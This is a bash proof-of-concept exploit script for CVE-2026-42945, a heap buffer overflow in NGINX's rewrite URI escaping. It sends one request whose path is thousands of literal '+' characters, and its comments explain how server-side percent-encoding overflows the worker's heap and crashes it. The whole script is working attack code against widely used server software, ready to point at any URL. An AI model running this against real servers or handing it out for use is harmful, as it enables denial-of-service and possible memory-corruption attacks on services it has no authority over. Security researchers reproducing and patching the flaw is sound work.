#!/usr/bin/env bash
# Single-request heap-buffer-overflow trigger for CVE-2026-42945.
# Sends GET /api/<N '+' bytes> to the vulnerable NGINX rewrite location.
# The unnamed capture $1 (all '+') is percent-encoded (+ -> %2B, 1->3 bytes)
# by ngx_escape_uri(NGX_ESCAPE_ARGS) into an undersized heap buffer,
# overflowing the NGINX worker heap and faulting the worker.
#
# Usage: run.sh <base_url> <count>
#   base_url : e.g. http://127.0.0.1:19321
#   count    : number of '+' bytes in the capture (e.g. 8000)
set -u

BASE_URL="${1:?base_url required}"
COUNT="${2:?count required}"

# Build a path of COUNT literal '+' characters (raw, unencoded on the wire).
PAYLOAD="$(printf '+%.0s' $(seq 1 "$COUNT"))"

echo "[*] Target:  ${BASE_URL}/api/<${COUNT} '+'>"
echo "[*] Sending single crafted request..."

# --path-as-is keeps '+' literal; the worker percent-encodes it server-side.
# A worker crash typically manifests as an empty reply / reset; we surface
# curl's exit code rather than interpreting success.
curl -sS --path-as-is -o /dev/null -w "[*] http_code=%{http_code} curl_exit_pending\n" \
    "${BASE_URL}/api/${PAYLOAD}"
rc=$?
echo "[*] curl exit code: ${rc}"
exit 0